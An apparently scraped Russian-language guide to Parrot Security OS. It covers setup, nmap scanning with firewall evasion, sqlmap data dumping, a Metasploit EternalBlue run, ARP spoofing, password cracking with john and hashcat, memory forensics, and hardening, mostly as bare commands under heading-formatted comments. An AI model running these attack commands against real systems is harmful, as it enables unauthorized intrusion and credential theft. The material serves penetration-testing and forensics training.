Parrot Security OS: Полное руководство по безопасности и криминалистике

<h2 id="proverka-podklyuchennyh-ustroystv">Проверка подключенных устройств</h2>

lsblk  # Linux

diskutil list  # macOS



<h2 id="zapis-obraza-zamenite-dev-sdx-na-vashe-ustroystvo">Запись образа (ЗАМЕНИТЕ /dev/sdX на ваше устройство!)</h2>

sudo dd if=parrot-security-5.x_amd64.iso of=/dev/sdX bs=4M status=progress oflag=sync



<h2 id="proverka-tselostnosti-posle-zapisi">Проверка целостности после записи</h2>

sha256sum parrot-security-5.x_amd64.iso

<h2 id="prosmotr-diskov">Просмотр дисков</h2>

lsblk

fdisk -l



<h2 id="sozdanie-razdelov-primer">Создание разделов (пример)</h2>

<h2 id="dev-sda1-ext4-50gb">/dev/sda1 - / (ext4, 50GB)</h2>

<h2 id="dev-sda2-home-ext4-ostalnoe-prostranstvo">/dev/sda2 - /home (ext4, остальное пространство)</h2>

<h2 id="dev-sda3-swap-8gb">/dev/sda3 - swap (8GB)</h2>

<h2 id="obnovlenie-spiska-paketov">Обновление списка пакетов</h2>

sudo apt update



<h2 id="obnovlenie-sistemy">Обновление системы</h2>

sudo apt full-upgrade -y



<h2 id="ochistka-kesha">Очистка кэша</h2>

sudo apt autoremove -y

sudo apt autoclean

<h2 id="redaktirovanie-fayla-istochnikov">Редактирование файла источников</h2>

sudo nano /etc/apt/sources.list.d/parrot.list



<h2 id="proverka-repozitoriev">Проверка репозиториев</h2>

sudo apt update

<h2 id="ustanovka-cherez-parrot-tools">Установка через parrot-tools</h2>

sudo parrot-update



<h2 id="ili-ustanovka-konkretnyh-naborov-instrumentov">Или установка конкретных наборов инструментов</h2>

sudo apt install parrot-tools-full

<h2 id="proverka-versii">Проверка версии</h2>

cat /etc/os-release



<h2 id="proverka-ustanovlennyh-instrumentov">Проверка установленных инструментов</h2>

parrot-tools --list



<h2 id="proverka-setevogo-podklyucheniya">Проверка сетевого подключения</h2>

ping -c 4 8.8.8.8

<h2 id="poisk-instrumenta">Поиск инструмента</h2>

parrot-tools --search nmap



<h2 id="zapusk-instrumenta-napryamuyu">Запуск инструмента напрямую</h2>

nmap

wireshark

metasploit

<h2 id="sozdanie-yarlyka-na-rabochem-stole">Создание ярлыка на рабочем столе</h2>

cat > ~/Desktop/nmap.desktop << EOF

[Desktop Entry]

Name=Nmap

Exec=nmap

Icon=utilities-terminal

Type=Application

Categories=Network;Security;

EOF



chmod +x ~/Desktop/nmap.desktop

<h2 id="parrot-security-os-podderzhivaet-neskolko-rabochih-prostranstv">Parrot Security OS поддерживает несколько рабочих пространств</h2>

<h2 id="pereklyuchenie-ctrl-alt-strelki">Переключение: Ctrl+Alt+Стрелки</h2>

<h2 id="ili-cherez-panel-zadach">Или через панель задач</h2>

<h2 id="redaktirovanie-goryachih-klavish">Редактирование горячих клавиш</h2>

<h2 id="menyu-parametry-klaviatura-kombinatsii-klavish">Меню → Параметры → Клавиатура → Комбинации клавиш</h2>

<h2 id="prosmotr-vseh-aliasov">Просмотр всех алиасов</h2>

alias



<h2 id="prosmotr-funktsiy">Просмотр функций</h2>

declare -f | grep -E "^[a-zA-Z_]+ \(\)"

<h2 id="dobavlenie-v-bashrc">Добавление в ~/.bashrc</h2>

echo 'alias ll="ls -lah"' >> ~/.bashrc

echo 'alias update="sudo apt update && sudo apt upgrade -y"' >> ~/.bashrc

echo 'alias ports="netstat -tulanp"' >> ~/.bashrc



<h2 id="primenenie-izmeneniy">Применение изменений</h2>

source ~/.bashrc

<h2 id="redaktirovanie-bashrc">Редактирование ~/.bashrc</h2>

nano ~/.bashrc



<h2 id="dobavlenie-tsvetov-dlya-ls">Добавление цветов для ls</h2>

export LS_OPTIONS='--color=auto'

eval "`dircolors`"

alias ls='ls $LS_OPTIONS'

<h2 id="avtomaticheskoe-montirovanie-cherez-gui">Автоматическое монтирование через GUI</h2>

<h2 id="ili-vruchnuyu-cherez-terminal">Или вручную через терминал</h2>

sudo mkdir /mnt/external

sudo mount /dev/sdb1 /mnt/external

<h2 id="skanirovanie-odnogo-hosta">Сканирование одного хоста</h2>

nmap 192.168.1.1



<h2 id="skanirovanie-diapazona-ip">Сканирование диапазона IP</h2>

nmap 192.168.1.1-254



<h2 id="skanirovanie-podseti">Сканирование подсети</h2>

nmap 192.168.1.0/24



<h2 id="opredelenie-operatsionnoy-sistemy">Определение операционной системы</h2>

nmap -O 192.168.1.1



<h2 id="opredelenie-versiy-sluzhb">Определение версий служб</h2>

nmap -sV 192.168.1.1



<h2 id="agressivnoe-skanirovanie-vse-optsii">Агрессивное сканирование (все опции)</h2>

nmap -A 192.168.1.1

<h2 id="skanirovanie-s-obhodom-fayrvola">Сканирование с обходом файрвола</h2>

nmap -f 192.168.1.1

nmap --mtu 16 192.168.1.1



<h2 id="skanirovanie-s-fragmentatsiey-paketov">Сканирование с фрагментацией пакетов</h2>

nmap -D RND:10 192.168.1.1  # Decoy сканирование



<h2 id="skanirovanie-cherez-proksi">Сканирование через прокси</h2>

nmap --proxies http://proxy.example.com:8080 192.168.1.1



<h2 id="sohranenie-rezultatov">Сохранение результатов</h2>

nmap -oN scan_results.txt 192.168.1.1

nmap -oX scan_results.xml 192.168.1.1

nmap -oG scan_results.gnmap 192.168.1.1

<h2 id="poisk-email-adresov">Поиск email адресов</h2>

theHarvester -d example.com -b google



<h2 id="poisk-cherez-neskolko-istochnikov">Поиск через несколько источников</h2>

theHarvester -d example.com -b google,bing,linkedin



<h2 id="sohranenie-rezultatov">Сохранение результатов</h2>

theHarvester -d example.com -b all -f results.html



<h2 id="poisk-poddomenov">Поиск поддоменов</h2>

theHarvester -d example.com -b crtsh

<h2 id="testirovanie-url-na-sql-inektsii">Тестирование URL на SQL инъекции</h2>

sqlmap -u "http://example.com/page.php?id=1"



<h2 id="testirovanie-s-post-dannymi">Тестирование с POST данными</h2>

sqlmap -u "http://example.com/login.php" --data="username=admin&password=test"



<h2 id="testirovanie-s-cookies">Тестирование с cookies</h2>

sqlmap -u "http://example.com/page.php" --cookie="session=abc123"



<h2 id="opredelenie-bazy-dannyh">Определение базы данных</h2>

sqlmap -u "http://example.com/page.php?id=1" --dbs



<h2 id="perechislenie-tablits">Перечисление таблиц</h2>

sqlmap -u "http://example.com/page.php?id=1" -D database_name --tables



<h2 id="izvlechenie-dannyh">Извлечение данных</h2>

sqlmap -u "http://example.com/page.php?id=1" -D database_name -T users --dump

<h2 id="zapusk-metasploit">Запуск Metasploit</h2>

msfconsole



<h2 id="ili-cherez-sluzhbu">Или через службу</h2>

sudo systemctl start postgresql

sudo msfdb init

msfconsole

<h2 id="poisk-eksploytov">Поиск эксплойтов</h2>

search windows smb



<h2 id="ispolzovanie-eksployta">Использование эксплойта</h2>

use exploit/windows/smb/ms17_010_eternalblue



<h2 id="prosmotr-optsiy">Просмотр опций</h2>

show options



<h2 id="ustanovka-parametrov">Установка параметров</h2>

set RHOSTS 192.168.1.100

set LHOST 192.168.1.50



<h2 id="zapusk-eksployta">Запуск эксплойта</h2>

exploit



<h2 id="rabota-s-sessiey">Работа с сессией</h2>

sessions

sessions -i 1

<h2 id="prosmotr-diskov">Просмотр дисков</h2>

sudo fdisk -l

sudo lsblk



<h2 id="sozdanie-obraza-diska">Создание образа диска</h2>

sudo dd if=/dev/sdb of=/mnt/evidence/disk_image.img bs=4M status=progress



<h2 id="sozdanie-obraza-s-proverkoy-tselostnosti">Создание образа с проверкой целостности</h2>

sudo dd if=/dev/sdb of=/mnt/evidence/disk_image.img bs=4M status=progress

sudo sha256sum /dev/sdb > /mnt/evidence/disk_hash.txt

sudo sha256sum /mnt/evidence/disk_image.img >> /mnt/evidence/disk_hash.txt



<h2 id="sozdanie-szhatogo-obraza">Создание сжатого образа</h2>

sudo dd if=/dev/sdb bs=4M status=progress | gzip > /mnt/evidence/disk_image.img.gz

<h2 id="montirovanie-obraza-tolko-dlya-chteniya">Монтирование образа (только для чтения)</h2>

sudo losetup -r -P /dev/loop0 disk_image.img

sudo mount -o ro /dev/loop0p1 /mnt/analysis



<h2 id="analiz-obraza-s-pomoschyu-autopsy">Анализ образа с помощью Autopsy</h2>

autopsy

<h2 id="file-new-case-add-data-source-disk-image">File → New Case → Add Data Source → Disk Image</h2>

<h2 id="zapusk-photorec">Запуск PhotoRec</h2>

sudo photorec



<h2 id="ili-cherez-komandnuyu-stroku">Или через командную строку</h2>

sudo photorec /log /mnt/recovery /cmd /dev/sdb partition_none,ext2,whole



<h2 id="vosstanovlenie-konkretnyh-tipov-faylov">Восстановление конкретных типов файлов</h2>

sudo photorec /log /mnt/recovery /cmd /dev/sdb partition_none,ext2,whole,fileopt,everything,enable,search

<h2 id="zapusk-testdisk">Запуск TestDisk</h2>

sudo testdisk



<h2 id="protsess">Процесс:</h2>

<h2 id="1-vyberite-disk">1. Выберите диск</h2>

<h2 id="2-vyberite-tip-tablitsy-razdelov">2. Выберите тип таблицы разделов</h2>

<h2 id="3-analyze-quick-search">3. Analyze → Quick Search</h2>

<h2 id="4-write-dlya-vosstanovleniya-razdelov">4. Write для восстановления разделов</h2>

<h2 id="volatility-predustanovlen-v-parrot-security-os">Volatility предустановлен в Parrot Security OS</h2>

volatility --info



<h2 id="opredelenie-profilya-obraza-pamyati">Определение профиля образа памяти</h2>

volatility -f memory.dmp imageinfo



<h2 id="analiz-protsessov">Анализ процессов</h2>

volatility -f memory.dmp --profile=Win7SP1x64 pslist

volatility -f memory.dmp --profile=Win7SP1x64 pstree

volatility -f memory.dmp --profile=Win7SP1x64 psscan



<h2 id="analiz-setevyh-soedineniy">Анализ сетевых соединений</h2>

volatility -f memory.dmp --profile=Win7SP1x64 netscan

volatility -f memory.dmp --profile=Win7SP1x64 connections



<h2 id="izvlechenie-paroley">Извлечение паролей</h2>

volatility -f memory.dmp --profile=Win7SP1x64 hashdump

volatility -f memory.dmp --profile=Win7SP1x64 lsadump



<h2 id="izvlechenie-faylov">Извлечение файлов</h2>

volatility -f memory.dmp --profile=Win7SP1x64 filescan

volatility -f memory.dmp --profile=Win7SP1x64 dumpfiles -D output/

<h2 id="proverka-podklyuchennyh-ustroystv">Проверка подключенных устройств</h2>

adb devices



<h2 id="esli-ustroystvo-ne-opredelyaetsya">Если устройство не определяется:</h2>

<h2 id="1-vklyuchite-otladku-po-usb-na-ustroystve">1. Включите отладку по USB на устройстве</h2>

<h2 id="2-podtverdite-razreshenie-na-otladku">2. Подтвердите разрешение на отладку</h2>

<h2 id="3-proverte-drayvery">3. Проверьте драйверы</h2>




<h2 id="poluchenie-informatsii-ob-ustroystve">Получение информации об устройстве</h2>

adb shell getprop ro.product.model

adb shell getprop ro.build.version.release



<h2 id="izvlechenie-dannyh">Извлечение данных</h2>

adb pull /sdcard/ output/

adb shell "su -c 'dd if=/dev/block/mmcblk0' > device_image.img"

<h2 id="zahvat-vseh-paketov">Захват всех пакетов</h2>

sudo tcpdump -i eth0



<h2 id="zahvat-s-filtrom">Захват с фильтром</h2>

sudo tcpdump -i eth0 host 192.168.1.100

sudo tcpdump -i eth0 port 80

sudo tcpdump -i eth0 tcp port 443



<h2 id="sohranenie-v-fayl">Сохранение в файл</h2>

sudo tcpdump -i eth0 -w capture.pcap



<h2 id="chtenie-iz-fayla">Чтение из файла</h2>

tcpdump -r capture.pcap

<h2 id="zapusk-wireshark">Запуск Wireshark</h2>

sudo wireshark



<h2 id="ili-cherez-komandnuyu-stroku">Или через командную строку</h2>

sudo wireshark -i eth0 -k



<h2 id="analiz-sohranennogo-fayla">Анализ сохраненного файла</h2>

wireshark capture.pcap



<h2 id="filtry-wireshark">Фильтры Wireshark:</h2>

<h2 id="ip-addr-192-168-1-100">ip.addr == 192.168.1.100</h2>

<h2 id="tcp-port-80">tcp.port == 80</h2>

<h2 id="http-request">http.request</h2>

<h2 id="dns">dns</h2>

<h2 id="http-trafik">HTTP трафик</h2>

http



<h2 id="https-trafik-zashifrovannyy-no-mozhno-videt-metadannye">HTTPS трафик (зашифрованный, но можно видеть метаданные)</h2>

tcp.port == 443



<h2 id="dns-zaprosy">DNS запросы</h2>

dns



<h2 id="poisk-podozritelnoy-aktivnosti">Поиск подозрительной активности</h2>

tcp.flags.syn == 1 && tcp.flags.ack == 0  # SYN сканирование

tcp.analysis.flags  # Анализ флагов TCP



<h2 id="poisk-opredelennyh-strok">Поиск определенных строк</h2>

frame contains "password"

http.request.uri contains "login"



<h2 id="analiz-po-ip-adresam">Анализ по IP адресам</h2>

ip.addr == 192.168.1.100

ip.src == 192.168.1.50 && ip.dst == 192.168.1.100

<h2 id="eksport-obektov-http">Экспорт объектов HTTP</h2>

<h2 id="file-export-objects-http">File → Export Objects → HTTP</h2>




<h2 id="eksport-paketov-v-razlichnye-formaty">Экспорт пакетов в различные форматы</h2>

<h2 id="file-export-packet-dissections-as-csv-json-etc">File → Export Packet Dissections → As CSV, JSON, etc.</h2>




<h2 id="eksport-statistiki">Экспорт статистики</h2>

<h2 id="statistics-protocol-hierarchy">Statistics → Protocol Hierarchy</h2>

<h2 id="ispolzovanie-skriptov-dlya-obnaruzheniya-uyazvimostey">Использование скриптов для обнаружения уязвимостей</h2>

nmap --script vuln 192.168.1.1



<h2 id="skanirovanie-na-konkretnye-uyazvimosti">Сканирование на конкретные уязвимости</h2>

nmap --script http-sql-injection 192.168.1.1

nmap --script smb-vuln-* 192.168.1.1



<h2 id="sbor-informatsii-cherez-skripty">Сбор информации через скрипты</h2>

nmap --script http-enum 192.168.1.1

nmap --script dns-brute example.com



<h2 id="agressivnoe-skanirovanie-so-vsemi-skriptami">Агрессивное сканирование со всеми скриптами</h2>

nmap -sC -sV -A 192.168.1.1

<h2 id="zapusk-ettercap">Запуск ettercap</h2>

sudo ettercap -G



<h2 id="ili-cherez-komandnuyu-stroku">Или через командную строку</h2>

<h2 id="arp-spoofing">ARP spoofing</h2>

sudo ettercap -T -M arp:remote /192.168.1.1// /192.168.1.100//



<h2 id="prosmotr-perehvachennogo-trafika">Просмотр перехваченного трафика</h2>

<h2 id="ettercap-avtomaticheski-sohranyaet-dannye">Ettercap автоматически сохраняет данные</h2>

<h2 id="monitoring-trafika-na-interfeyse">Мониторинг трафика на интерфейсе</h2>

sudo iftop -i eth0



<h2 id="otobrazhenie-portov">Отображение портов</h2>

sudo iftop -i eth0 -P



<h2 id="filtratsiya-po-ip">Фильтрация по IP</h2>

sudo iftop -i eth0 -f "host 192.168.1.100"

<h2 id="monitoring-trafika-po-protsessam">Мониторинг трафика по процессам</h2>

sudo nethogs eth0



<h2 id="obnovlenie-kazhdye-5-sekund">Обновление каждые 5 секунд</h2>

sudo nethogs -d 5 eth0

<h2 id="ustanovka-dnstop-esli-ne-ustanovlen">Установка dnstop (если не установлен)</h2>

sudo apt install dnstop



<h2 id="monitoring-dns-trafika">Мониторинг DNS трафика</h2>

sudo dnstop -l 5 eth0



<h2 id="analiz-dns-cherez-tcpdump">Анализ DNS через tcpdump</h2>

sudo tcpdump -i eth0 port 53 -n

<h2 id="zapusk-burp-suite">Запуск Burp Suite</h2>

burpsuite



<h2 id="ili-cherez-komandnuyu-stroku">Или через командную строку</h2>

java -jar /usr/share/burpsuite/burpsuite.jar

<h2 id="perehvat-zaprosov-cherez-proxy">Перехват запросов через Proxy</h2>

<h2 id="modifikatsiya-zaprosov-v-repeater">Модификация запросов в Repeater</h2>

<h2 id="skanirovanie-cherez-scanner">Сканирование через Scanner</h2>

<h2 id="analiz-cherez-intruder-dlya-brutfors-atak">Анализ через Intruder для брутфорс атак</h2>

<h2 id="zapusk-zap">Запуск ZAP</h2>

zap.sh



<h2 id="ili-cherez-gui">Или через GUI</h2>

owasp-zap

<h2 id="zapusk-bystrogo-skanirovaniya">Запуск быстрого сканирования</h2>

zap-cli quick-scan http://example.com



<h2 id="polnoe-skanirovanie">Полное сканирование</h2>

zap-cli full-scan http://example.com



<h2 id="skanirovanie-s-autentifikatsiey">Сканирование с аутентификацией</h2>

zap-cli quick-scan --scanners all http://example.com

<h2 id="polnoe-avtomaticheskoe-testirovanie">Полное автоматическое тестирование</h2>

sqlmap -u "http://example.com/page.php?id=1" --batch --crawl=3



<h2 id="testirovanie-s-ispolzovaniem-tehnik-obhoda">Тестирование с использованием техник обхода</h2>

sqlmap -u "http://example.com/page.php?id=1" --tamper=space2comment



<h2 id="mnogopotochnoe-testirovanie">Многопоточное тестирование</h2>

sqlmap -u "http://example.com/page.php?id=1" --threads=10



<h2 id="izvlechenie-dannyh-s-ispolzovaniem-razlichnyh-metodov">Извлечение данных с использованием различных методов</h2>

sqlmap -u "http://example.com/page.php?id=1" -D database -T users --dump --technique=BEUSTQ

<h2 id="bazovoe-skanirovanie">Базовое сканирование</h2>

nikto -h http://example.com



<h2 id="skanirovanie-s-vyvodom-v-fayl">Сканирование с выводом в файл</h2>

nikto -h http://example.com -o nikto_results.html -Format htm



<h2 id="skanirovanie-s-ispolzovaniem-proksi">Сканирование с использованием прокси</h2>

nikto -h http://example.com -useproxy http://proxy.example.com:8080



<h2 id="skanirovanie-s-autentifikatsiey">Сканирование с аутентификацией</h2>

nikto -h http://example.com -id username:password



<h2 id="skanirovanie-na-konkretnye-uyazvimosti">Сканирование на конкретные уязвимости</h2>

nikto -h http://example.com -Plugins "apache_expect_xss"

<h2 id="vzlom-paroley-iz-fayla">Взлом паролей из файла</h2>

john passwords.txt



<h2 id="ispolzovanie-slovarya">Использование словаря</h2>

john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt



<h2 id="kombinirovannyy-rezhim-slovar-pravila">Комбинированный режим (словарь + правила)</h2>

john --wordlist=/usr/share/wordlists/rockyou.txt --rules passwords.txt



<h2 id="brutfors-ataka">Брутфорс атака</h2>

john --incremental passwords.txt



<h2 id="pokaz-vzlomannyh-paroley">Показ взломанных паролей</h2>

john --show passwords.txt

<h2 id="vzlom-windows-paroley-iz-sam-fayla">Взлом Windows паролей (из SAM файла)</h2>

john sam_file



<h2 id="vzlom-linux-paroley-iz-etc-shadow">Взлом Linux паролей (из /etc/shadow)</h2>

unshadow /etc/passwd /etc/shadow > unshadowed.txt

john unshadowed.txt



<h2 id="vzlom-zip-arhivov">Взлом ZIP архивов</h2>

zip2john archive.zip > zip_hash.txt

john zip_hash.txt

<h2 id="opredelenie-tipa-hesha">Определение типа хеша</h2>

hashcat --help | grep -i "hash type"



<h2 id="vzlom-s-ispolzovaniem-slovarya">Взлом с использованием словаря</h2>

hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt



<h2 id="gde">Где:</h2>

<h2 id="m-0-md5">-m 0 = MD5</h2>

<h2 id="a-0-ataka-po-slovaryu">-a 0 = атака по словарю</h2>




<h2 id="brutfors-ataka">Брутфорс атака</h2>

hashcat -m 0 -a 3 hash.txt ?a?a?a?a?a?a



<h2 id="kombinirovannyy-rezhim">Комбинированный режим</h2>

hashcat -m 0 -a 1 hash.txt wordlist1.txt wordlist2.txt



<h2 id="ispolzovanie-pravil">Использование правил</h2>

hashcat -m 0 -a 0 hash.txt wordlist.txt -r rules/best64.rule

<h2 id="podklyuchenie-k-baze-dannyh-napryamuyu">Подключение к базе данных напрямую</h2>

sqlmap -d "mysql://user:password@192.168.1.100:3306/database"



<h2 id="vypolnenie-sql-komand">Выполнение SQL команд</h2>

sqlmap -d "mysql://user:password@192.168.1.100:3306/database" --sql-query "SELECT * FROM users"



<h2 id="eksport-dannyh">Экспорт данных</h2>

sqlmap -d "mysql://user:password@192.168.1.100:3306/database" -D database_name --dump-all

<h2 id="mysql">MySQL</h2>

mysql -h 192.168.1.100 -u user -p



<h2 id="postgresql">PostgreSQL</h2>

psql -h 192.168.1.100 -U user -d database



<h2 id="mongodb">MongoDB</h2>

mongo mongodb://192.168.1.100:27017/database

<h2 id="generatsiya-slovarya">Генерация словаря</h2>

crunch 6 8 -t @@@@%% -o wordlist.txt



<h2 id="gde">Где:</h2>

<h2 id="6-8-dlina-ot-6-do-8-simvolov">6 8 = длина от 6 до 8 символов</h2>

<h2 id="t-shablon-4-bukvy-2-tsifry">-t @@@@%% = шаблон (4 буквы + 2 цифры)</h2>

<h2 id="o-vyvod-v-fayl">-o = вывод в файл</h2>




<h2 id="generatsiya-s-ispolzovaniem-nabora-simvolov">Генерация с использованием набора символов</h2>

crunch 4 4 abc123 -o wordlist.txt

<h2 id="sozdanie-slovarya-iz-veb-sayta">Создание словаря из веб-сайта</h2>

cewl http://example.com -w wordlist.txt



<h2 id="s-ukazaniem-glubiny">С указанием глубины</h2>

cewl http://example.com -d 3 -w wordlist.txt



<h2 id="s-minimalnoy-dlinoy-slov">С минимальной длиной слов</h2>

cewl http://example.com -m 5 -w wordlist.txt

<h2 id="zapusk-lokalnogo-ekzemplyara">Запуск локального экземпляра</h2>

cyberchef



<h2 id="ili-cherez-veb-interfeys">Или через веб-интерфейс</h2>

<h2 id="otkroyte-brauzer-i-pereydite-na-localhost-8000">Откройте браузер и перейдите на localhost:8000</h2>

<h2 id="skrytie-fayla-v-izobrazhenii">Скрытие файла в изображении</h2>

steghide embed -cf image.jpg -ef secret.txt -p password



<h2 id="izvlechenie-skrytyh-dannyh">Извлечение скрытых данных</h2>

steghide extract -sf image.jpg -p password



<h2 id="informatsiya-o-fayle">Информация о файле</h2>

steghide info image.jpg

<h2 id="zapusk-stegsolve">Запуск Stegsolve</h2>

stegsolve



<h2 id="ili-cherez-java">Или через Java</h2>

java -jar stegsolve.jar

<h2 id="analiz-fayla-na-vstroennye-dannye">Анализ файла на встроенные данные</h2>

binwalk file.bin



<h2 id="izvlechenie-vstroennyh-dannyh">Извлечение встроенных данных</h2>

binwalk -e file.bin



<h2 id="glubokiy-analiz">Глубокий анализ</h2>

binwalk -A file.bin



<h2 id="poisk-signatur">Поиск сигнатур</h2>

binwalk -B file.bin

<h2 id="opredelenie-tipa-hesha">Определение типа хеша</h2>

hash-identifier



<h2 id="vvedite-hesh-dlya-analiza">Введите хеш для анализа</h2>

#!/bin/bash

<h2 id="avtomaticheskoe-skanirovanie-seti">Автоматическое сканирование сети</h2>




TARGET=$1

OUTPUT_DIR="./scans/$(date +%Y%m%d_%H%M%S)"

mkdir -p "$OUTPUT_DIR"



echo "Начало сканирования: $TARGET"

echo "Результаты сохраняются в: $OUTPUT_DIR"



<h2 id="nmap-skanirovanie">Nmap сканирование</h2>

echo "Выполнение Nmap сканирования..."

nmap -sS -sV -O -A "$TARGET" -oN "$OUTPUT_DIR/nmap_scan.txt" -oX "$OUTPUT_DIR/nmap_scan.xml"



<h2 id="nikto-skanirovanie-esli-obnaruzhen-veb-server">Nikto сканирование (если обнаружен веб-сервер)</h2>

if grep -q "80/tcp\|443/tcp" "$OUTPUT_DIR/nmap_scan.txt"; then

    echo "Выполнение Nikto сканирования..."

    nikto -h "http://$TARGET" -o "$OUTPUT_DIR/nikto_scan.html" -Format htm

fi



<h2 id="dirb-skanirovanie-esli-obnaruzhen-veb-server">Dirb сканирование (если обнаружен веб-сервер)</h2>

if grep -q "80/tcp\|443/tcp" "$OUTPUT_DIR/nmap_scan.txt"; then

    echo "Выполнение Dirb сканирования..."

    dirb "http://$TARGET" -o "$OUTPUT_DIR/dirb_scan.txt"

fi



echo "Сканирование завершено. Результаты в $OUTPUT_DIR"

#!/usr/bin/env python3

import subprocess

import sys

from pathlib import Path

from datetime import datetime



def run_scan(target, output_dir):

    """Выполнение сканирования цели"""

    output_dir = Path(output_dir)

    output_dir.mkdir(exist_ok=True)

    

    timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")

    

    # Nmap сканирование

    print(f"Выполнение Nmap сканирования {target}...")

    nmap_cmd = [

        'nmap',

        '-sS', '-sV', '-O', '-A',

        target,

        '-oN', str(output_dir / f'nmap_{timestamp}.txt'),

        '-oX', str(output_dir / f'nmap_{timestamp}.xml')

    ]

    subprocess.run(nmap_cmd, check=True)

    

    # Анализ результатов

    with open(output_dir / f'nmap_{timestamp}.txt', 'r') as f:

        content = f.read()

        if '80/tcp' in content or '443/tcp' in content:

            print("Обнаружен веб-сервер, запуск дополнительных сканирований...")

            # Дополнительные сканирования веб-приложений

            run_web_scan(target, output_dir, timestamp)

    

    return output_dir



def run_web_scan(target, output_dir, timestamp):

    """Сканирование веб-приложения"""

    # Nikto

    nikto_cmd = [

        'nikto',

        '-h', f'http://{target}',

        '-o', str(output_dir / f'nikto_{timestamp}.html'),

        '-Format', 'htm'

    ]

    subprocess.run(nikto_cmd)



if __name__ == '__main__':

    if len(sys.argv) < 2:

        print("Использование: python3 scan.py <target>")

        sys.exit(1)

    

    target = sys.argv[1]

    output_dir = f"./scans/{datetime.now().strftime('%Y%m%d_%H%M%S')}"

    run_scan(target, output_dir)

<h2 id="tekuschee-ispolzovanie">Текущее использование</h2>

free -h



<h2 id="detalnaya-informatsiya">Детальная информация</h2>

cat /proc/meminfo



<h2 id="monitoring-protsessov">Мониторинг процессов</h2>

top

htop

<h2 id="proverka-swap">Проверка swap</h2>

swapon --show



<h2 id="sozdanie-swap-fayla-esli-neobhodimo">Создание swap файла (если необходимо)</h2>

sudo fallocate -l 4G /swapfile

sudo chmod 600 /swapfile

sudo mkswap /swapfile

sudo swapon /swapfile



<h2 id="dobavlenie-v-etc-fstab-dlya-postoyannogo-ispolzovaniya">Добавление в /etc/fstab для постоянного использования</h2>

echo '/swapfile none swap sw 0 0' | sudo tee -a /etc/fstab

<h2 id="zapusk-protsessa-s-vysokim-prioritetom">Запуск процесса с высоким приоритетом</h2>

nice -n -20 command



<h2 id="izmenenie-prioriteta-zapuschennogo-protsessa">Изменение приоритета запущенного процесса</h2>

renice -20 -p PID



<h2 id="ispolzovanie-vseh-yader">Использование всех ядер</h2>

<h2 id="mnogie-instrumenty-podderzhivayut-mnogopotochnost">Многие инструменты поддерживают многопоточность</h2>

nmap -T4 --min-parallelism 100 target

<h2 id="ispolzovanie-diska">Использование диска</h2>

df -h



<h2 id="razmer-papok">Размер папок</h2>

du -sh /path/to/directory

du -h --max-depth=1 /path/to/directory



<h2 id="ochistka-paketnogo-kesha">Очистка пакетного кэша</h2>

sudo apt clean

sudo apt autoremove

<h2 id="uvelichenie-buferov">Увеличение буферов</h2>

sudo sysctl -w net.core.rmem_max=16777216

sudo sysctl -w net.core.wmem_max=16777216



<h2 id="postoyannye-nastroyki-v-etc-sysctl-conf">Постоянные настройки в /etc/sysctl.conf</h2>

echo 'net.core.rmem_max = 16777216' | sudo tee -a /etc/sysctl.conf

echo 'net.core.wmem_max = 16777216' | sudo tee -a /etc/sysctl.conf

sudo sysctl -p

<h2 id="agressivnoe-skanirovanie-s-optimizatsiey">Агрессивное сканирование с оптимизацией</h2>

nmap -T4 -n --min-rate 1000 target



<h2 id="parallelnoe-skanirovanie">Параллельное сканирование</h2>

nmap -T4 --min-parallelism 100 target



<h2 id="gde">Где:</h2>

<h2 id="t4-agressivnyy-tayming">-T4 = агрессивный тайминг</h2>

<h2 id="n-bez-dns-rezolyutsii-bystree">-n = без DNS резолюции (быстрее)</h2>

<h2 id="min-rate-minimalnaya-skorost-skanirovaniya">--min-rate = минимальная скорость сканирования</h2>

<h2 id="uvelichenie-limita-bazy-dannyh">Увеличение лимита базы данных</h2>

<h2 id="v-msfconsole">В msfconsole:</h2>

msfconsole

db_connect postgres:password@localhost/msf

<h2 id="ustanovka-openvpn-esli-ne-ustanovlen">Установка OpenVPN (если не установлен)</h2>

sudo apt install openvpn



<h2 id="podklyuchenie-k-vpn">Подключение к VPN</h2>

sudo openvpn --config client.ovpn



<h2 id="ili-cherez-networkmanager">Или через NetworkManager</h2>

<h2 id="nastroyki-set-vpn-dobavit">Настройки → Сеть → VPN → Добавить</h2>

<h2 id="ustanovka-wireguard">Установка WireGuard</h2>

sudo apt install wireguard



<h2 id="generatsiya-klyuchey">Генерация ключей</h2>

wg genkey | tee privatekey | wg pubkey > publickey



<h2 id="nastroyka-interfeysa">Настройка интерфейса</h2>

sudo nano /etc/wireguard/wg0.conf

<h2 id="zapusk-tor">Запуск Tor</h2>

sudo systemctl start tor



<h2 id="proverka-statusa">Проверка статуса</h2>

sudo systemctl status tor



<h2 id="ispolzovanie-cherez-proksi">Использование через прокси</h2>

<h2 id="nastroyka-prilozheniy-na-ispolzovanie-127-0-0-1-9050">Настройка приложений на использование 127.0.0.1:9050</h2>

<h2 id="vklyuchenie-anonimnosti">Включение анонимности</h2>

sudo anonsurf start



<h2 id="proverka-statusa">Проверка статуса</h2>

sudo anonsurf status



<h2 id="vyklyuchenie">Выключение</h2>

sudo anonsurf stop



<h2 id="izmenenie-identichnosti">Изменение идентичности</h2>

sudo anonsurf change

<h2 id="ispolzovanie-ufw-uncomplicated-firewall">Использование UFW (Uncomplicated Firewall)</h2>

sudo ufw enable

sudo ufw status



<h2 id="razreshenie-konkretnyh-portov">Разрешение конкретных портов</h2>

sudo ufw allow 22/tcp

sudo ufw allow 80/tcp

sudo ufw allow 443/tcp



<h2 id="blokirovka-ip-adresov">Блокировка IP адресов</h2>

sudo ufw deny from 192.168.1.100

<h2 id="obnovlenie-sistemy">Обновление системы</h2>

sudo apt update

sudo apt full-upgrade -y



<h2 id="avtomaticheskie-obnovleniya-bezopasnosti">Автоматические обновления безопасности</h2>

sudo apt install unattended-upgrades

sudo dpkg-reconfigure -plow unattended-upgrades

<h2 id="redaktirovanie-konfiguratsii-ssh">Редактирование конфигурации SSH</h2>

sudo nano /etc/ssh/sshd_config



<h2 id="rekomenduemye-nastroyki">Рекомендуемые настройки:</h2>

<h2 id="permitrootlogin-no">PermitRootLogin no</h2>

<h2 id="passwordauthentication-no-ispolzovat-klyuchi">PasswordAuthentication no (использовать ключи)</h2>

<h2 id="port-2222-izmenit-standartnyy-port">Port 2222 (изменить стандартный порт)</h2>




<h2 id="perezapusk-ssh">Перезапуск SSH</h2>

